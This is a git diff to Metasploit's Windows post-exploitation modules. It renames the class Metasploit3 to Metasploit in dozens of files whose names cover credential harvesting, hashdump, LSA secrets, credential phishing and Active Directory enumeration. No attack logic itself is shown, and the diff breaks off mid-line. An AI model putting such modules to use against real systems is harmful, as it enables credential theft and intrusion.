a/modules/post/windows/gather/credentials/rdc_manager_creds.rb b/modules/post/windows/gather/credentials/rdc_manager_creds.rb index 45f0e8ed0d..804f8084a8 100644 --- a/modules/post/windows/gather/credentials/rdc_manager_creds.rb +++ b/modules/post/windows/gather/credentials/rdc_manager_creds.rb @@ -10,7 +10,7 @@ require 'rex' require 'rexml/document' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::UserProfiles include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/skype.rb b/modules/post/windows/gather/credentials/skype.rb index f950de44e5..d054c01da7 100644 --- a/modules/post/windows/gather/credentials/skype.rb +++ b/modules/post/windows/gather/credentials/skype.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb index cb0fce4d6e..aeaf7b23c7 100644 --- a/modules/post/windows/gather/credentials/smartermail.rb +++ b/modules/post/windows/gather/credentials/smartermail.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/smartftp.rb b/modules/post/windows/gather/credentials/smartftp.rb index 1fa9bba41f..29e7cd9794 100644 --- a/modules/post/windows/gather/credentials/smartftp.rb +++ b/modules/post/windows/gather/credentials/smartftp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::UserProfiles def initialize(info={}) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index c3461846d4..601d5ba9d9 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'openssl' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/sso.rb b/modules/post/windows/gather/credentials/sso.rb index d2584ecf2c..0eeb4935d7 100644 --- a/modules/post/windows/gather/credentials/sso.rb +++ b/modules/post/windows/gather/credentials/sso.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/post/windows/priv' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/steam.rb b/modules/post/windows/gather/credentials/steam.rb index f17abf7c5c..18b1020688 100644 --- a/modules/post/windows/gather/credentials/steam.rb +++ b/modules/post/windows/gather/credentials/steam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb index 731d3da103..b59dbb288f 100644 --- a/modules/post/windows/gather/credentials/tortoisesvn.rb +++ b/modules/post/windows/gather/credentials/tortoisesvn.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb index 1f51aabd04..e6fd5bcd99 100644 --- a/modules/post/windows/gather/credentials/total_commander.rb +++ b/modules/post/windows/gather/credentials/total_commander.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/trillian.rb b/modules/post/windows/gather/credentials/trillian.rb index a80e9bef9e..fbff6131c3 100644 --- a/modules/post/windows/gather/credentials/trillian.rb +++ b/modules/post/windows/gather/credentials/trillian.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 0442f20835..67c2fef055 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -10,7 +10,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'rex/proto/rfb' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 5af3bdb12d..bb4217be58 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb index e9c4d452d1..bc6d4d2cbf 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -9,7 +9,7 @@ require 'rex/parser/ini' require 'rex/parser/winscp' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/wsftp_client.rb b/modules/post/windows/gather/credentials/wsftp_client.rb index 1227e572e2..60e9f05920 100644 --- a/modules/post/windows/gather/credentials/wsftp_client.rb +++ b/modules/post/windows/gather/credentials/wsftp_client.rb @@ -9,7 +9,7 @@ require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/dnscache_dump.rb b/modules/post/windows/gather/dnscache_dump.rb index de4bf2fefb..4b16e89c1a 100644 --- a/modules/post/windows/gather/dnscache_dump.rb +++ b/modules/post/windows/gather/dnscache_dump.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index 13d701aac1..a5054359f0 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb index 2801d749ab..deb9a25dbd 100644 --- a/modules/post/windows/gather/enum_ad_bitlocker.rb +++ b/modules/post/windows/gather/enum_ad_bitlocker.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 27f3a742c3..ac2d3a5511 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_groups.rb b/modules/post/windows/gather/enum_ad_groups.rb index ade732c27a..f8e73403dc 100644 --- a/modules/post/windows/gather/enum_ad_groups.rb +++ b/modules/post/windows/gather/enum_ad_groups.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP # include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ad_managedby_groups.rb b/modules/post/windows/gather/enum_ad_managedby_groups.rb index 72959f6086..1370b6cdfa 100644 --- a/modules/post/windows/gather/enum_ad_managedby_groups.rb +++ b/modules/post/windows/gather/enum_ad_managedby_groups.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_service_principal_names.rb b/modules/post/windows/gather/enum_ad_service_principal_names.rb index 125c9feb59..13d69148f9 100644 --- a/modules/post/windows/gather/enum_ad_service_principal_names.rb +++ b/modules/post/windows/gather/enum_ad_service_principal_names.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_to_wordlist.rb b/modules/post/windows/gather/enum_ad_to_wordlist.rb index 33f37b1bcf..46aa415eb5 100644 --- a/modules/post/windows/gather/enum_ad_to_wordlist.rb +++ b/modules/post/windows/gather/enum_ad_to_wordlist.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_user_comments.rb b/modules/post/windows/gather/enum_ad_user_comments.rb index 22519eae57..b971571e05 100644 --- a/modules/post/windows/gather/enum_ad_user_comments.rb +++ b/modules/post/windows/gather/enum_ad_user_comments.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_users.rb b/modules/post/windows/gather/enum_ad_users.rb index 2fc5ed7779..b5d5cc5003 100644 --- a/modules/post/windows/gather/enum_ad_users.rb +++ b/modules/post/windows/gather/enum_ad_users.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_applications.rb b/modules/post/windows/gather/enum_applications.rb index b3b2a25bab..9446b8c553 100644 --- a/modules/post/windows/gather/enum_applications.rb +++ b/modules/post/windows/gather/enum_applications.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_artifacts.rb b/modules/post/windows/gather/enum_artifacts.rb index 2247ea9dc1..d5c5496542 100644 --- a/modules/post/windows/gather/enum_artifacts.rb +++ b/modules/post/windows/gather/enum_artifacts.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'yaml' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File diff --git a/modules/post/windows/gather/enum_av_excluded.rb b/modules/post/windows/gather/enum_av_excluded.rb index 0aa167b783..ca1ee05879 100644 --- a/modules/post/windows/gather/enum_av_excluded.rb +++ b/modules/post/windows/gather/enum_av_excluded.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry def initialize(info = {}) diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index f1af882553..44e0fd612b 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_computers.rb b/modules/post/windows/gather/enum_computers.rb index 8ecc9ee524..c04b586cce 100644 --- a/modules/post/windows/gather/enum_computers.rb +++ b/modules/post/windows/gather/enum_computers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index 27ff05d2ed..da29a07b8c 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_devices.rb b/modules/post/windows/gather/enum_devices.rb index 9829aa63e8..a7924aac03 100644 --- a/modules/post/windows/gather/enum_devices.rb +++ b/modules/post/windows/gather/enum_devices.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb index c772da1822..7e49b236f0 100644 --- a/modules/post/windows/gather/enum_dirperms.rb +++ b/modules/post/windows/gather/enum_dirperms.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_domain.rb b/modules/post/windows/gather/enum_domain.rb index 6d1c252834..8d0f312872 100644 --- a/modules/post/windows/gather/enum_domain.rb +++ b/modules/post/windows/gather/enum_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/gather/enum_domain_group_users.rb b/modules/post/windows/gather/enum_domain_group_users.rb index f9c2f877a3..28a510d238 100644 --- a/modules/post/windows/gather/enum_domain_group_users.rb +++ b/modules/post/windows/gather/enum_domain_group_users.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Gather Enumerate Domain Group', diff --git a/modules/post/windows/gather/enum_domain_tokens.rb b/modules/post/windows/gather/enum_domain_tokens.rb index c917d0be8d..a31427c1b2 100644 --- a/modules/post/windows/gather/enum_domain_tokens.rb +++ b/modules/post/windows/gather/enum_domain_tokens.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_domain_users.rb b/modules/post/windows/gather/enum_domain_users.rb index 2ebfbb3208..ce45ff9294 100644 --- a/modules/post/windows/gather/enum_domain_users.rb +++ b/modules/post/windows/gather/enum_domain_users.rb @@ -4,7 +4,7 @@ require 'msf/core/post/common' require 'msf/core/post/windows/registry' require 'msf/core/post/windows/netapi' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Common include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_domains.rb b/modules/post/windows/gather/enum_domains.rb index 28dc44c576..6d56f1bcb7 100644 --- a/modules/post/windows/gather/enum_domains.rb +++ b/modules/post/windows/gather/enum_domains.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/netapi' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::NetAPI diff --git a/modules/post/windows/gather/enum_files.rb b/modules/post/windows/gather/enum_files.rb index 3b28a296ed..506f96c3d8 100644 --- a/modules/post/windows/gather/enum_files.rb +++ b/modules/post/windows/gather/enum_files.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_hostfile.rb b/modules/post/windows/gather/enum_hostfile.rb index 9f2d188091..b4c17563d3 100644 --- a/modules/post/windows/gather/enum_hostfile.rb +++ b/modules/post/windows/gather/enum_hostfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/enum_ie.rb b/modules/post/windows/gather/enum_ie.rb index 846df38f16..b2f2561eb6 100644 --- a/modules/post/windows/gather/enum_ie.rb +++ b/modules/post/windows/gather/enum_ie.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_logged_on_users.rb b/modules/post/windows/gather/enum_logged_on_users.rb index fc5958c96c..5790f34c65 100644 --- a/modules/post/windows/gather/enum_logged_on_users.rb +++ b/modules/post/windows/gather/enum_logged_on_users.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index ae2d0bc3a6..2a9bcbaf7e 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index 4644a8823a..a1f5bbca11 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'rex/registry' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_patches.rb b/modules/post/windows/gather/enum_patches.rb index a6c4162dfd..94a3f5dc80 100644 --- a/modules/post/windows/gather/enum_patches.rb +++ b/modules/post/windows/gather/enum_patches.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/windows/extapi' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Common include Msf::Post::Windows::ExtAPI diff --git a/modules/post/windows/gather/enum_powershell_env.rb b/modules/post/windows/gather/enum_powershell_env.rb index 41ca9b2119..b52f0095a2 100644 --- a/modules/post/windows/gather/enum_powershell_env.rb +++ b/modules/post/windows/gather/enum_powershell_env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index f6edb22bf1..e42decd245 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index bb98d36e77..4f16ddcf8b 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Post::Windows::Services diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb index 00d38c0806..d33ae86b86 100644 --- a/modules/post/windows/gather/enum_putty_saved_sessions.rb +++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/common' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::File diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb index eff601943b..427d160367 100644 --- a/modules/post/windows/gather/enum_services.rb +++ b/modules/post/windows/gather/enum_services.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Services diff --git a/modules/post/windows/gather/enum_shares.rb b/modules/post/windows/gather/enum_shares.rb index b0dfe05714..cbbadb4714 100644 --- a/modules/post/windows/gather/enum_shares.rb +++ b/modules/post/windows/gather/enum_shares.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_snmp.rb b/modules/post/windows/gather/enum_snmp.rb index 9316605288..d7059284ac 100644 --- a/modules/post/windows/gather/enum_snmp.rb +++ b/modules/post/windows/gather/enum_snmp.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_termserv.rb b/modules/post/windows/gather/enum_termserv.rb index 2ad65c80e2..28d313127d 100644 --- a/modules/post/windows/gather/enum_termserv.rb +++ b/modules/post/windows/gather/enum_termserv.rb @@ -10,7 +10,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_tokens.rb b/modules/post/windows/gather/enum_tokens.rb index 4a7838d3cd..3df7998151 100644 --- a/modules/post/windows/gather/enum_tokens.rb +++ b/modules/post/windows/gather/enum_tokens.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/gather/enum_tomcat.rb b/modules/post/windows/gather/enum_tomcat.rb index 2f98e036c6..b50e705dc1 100644 --- a/modules/post/windows/gather/enum_tomcat.rb +++ b/modules/post/windows/gather/enum_tomcat.rb @@ -8,7 +8,7 @@ require 'rexml/document' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb index 09dea61737..156210b552 100644 --- a/modules/post/windows/gather/enum_unattend.rb +++ b/modules/post/windows/gather/enum_unattend.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/parser/unattend' require 'rexml/document' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/file_from_raw_ntfs.rb b/modules/post/windows/gather/file_from_raw_ntfs.rb index 2500d9226f..07badf8821 100644 --- a/modules/post/windows/gather/file_from_raw_ntfs.rb +++ b/modules/post/windows/gather/file_from_raw_ntfs.rb @@ -5,7 +5,7 @@ require 'rex/parser/fs/ntfs' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Error diff --git a/modules/post/windows/gather/forensics/browser_history.rb b/modules/post/windows/gather/forensics/browser_history.rb index 161789429b..e99ff1588e 100644 --- a/modules/post/windows/gather/forensics/browser_history.rb +++ b/modules/post/windows/gather/forensics/browser_history.rb @@ -10,7 +10,7 @@ require 'msf/core/post/windows/user_profiles' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/forensics/duqu_check.rb b/modules/post/windows/gather/forensics/duqu_check.rb index c967b5f6ab..dfa700b536 100644 --- a/modules/post/windows/gather/forensics/duqu_check.rb +++ b/modules/post/windows/gather/forensics/duqu_check.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index 34b24c51cb..293c83d887 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -11,7 +11,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/imager.rb b/modules/post/windows/gather/forensics/imager.rb index 209a90c492..5d0545e3c5 100644 --- a/modules/post/windows/gather/forensics/imager.rb +++ b/modules/post/windows/gather/forensics/imager.rb @@ -14,7 +14,7 @@ require 'digest/md5' require 'digest/sha1' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/nbd_server.rb b/modules/post/windows/gather/forensics/nbd_server.rb index 2a029ce6a3..db7f052e99 100644 --- a/modules/post/windows/gather/forensics/nbd_server.rb +++ b/modules/post/windows/gather/forensics/nbd_server.rb @@ -14,7 +14,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/recovery_files.rb b/modules/post/windows/gather/forensics/recovery_files.rb index c32cfa7420..e68a5b64cb 100644 --- a/modules/post/windows/gather/forensics/recovery_files.rb +++ b/modules/post/windows/gather/forensics/recovery_files.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb index 0f4b866d16..9ee1fe28d4 100644 --- a/modules/post/windows/gather/hashdump.rb +++ b/modules/post/windows/gather/hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb index 96fbc11ccf..e7555431f7 100644 --- a/modules/post/windows/gather/local_admin_search_enum.rb +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/lsa_secrets.rb b/modules/post/windows/gather/lsa_secrets.rb index 812691a029..cd5d3436c0 100644 --- a/modules/post/windows/gather/lsa_secrets.rb +++ b/modules/post/windows/gather/lsa_secrets.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/common' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 936aae5cf2..b3a8dd138a 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info(info, diff --git a/modules/post/windows/gather/netlm_downgrade.rb b/modules/post/windows/gather/netlm_downgrade.rb index b1dca4c2a8..cb2cc8bb35 100644 --- a/modules/post/windows/gather/netlm_downgrade.rb +++ b/modules/post/windows/gather/netlm_downgrade.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::WindowsServices diff --git a/modules/post/windows/gather/outlook.rb b/modules/post/windows/gather/outlook.rb index 92269c8d9c..ea739c055b 100644 --- a/modules/post/windows/gather/outlook.rb +++ b/modules/post/windows/gather/outlook.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Powershell diff --git a/modules/post/windows/gather/phish_windows_credentials.rb b/modules/post/windows/gather/phish_windows_credentials.rb index f01d8c6b95..60a0592951 100644 --- a/modules/post/windows/gather/phish_windows_credentials.rb +++ b/modules/post/windows/gather/phish_windows_credentials.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Powershell diff --git 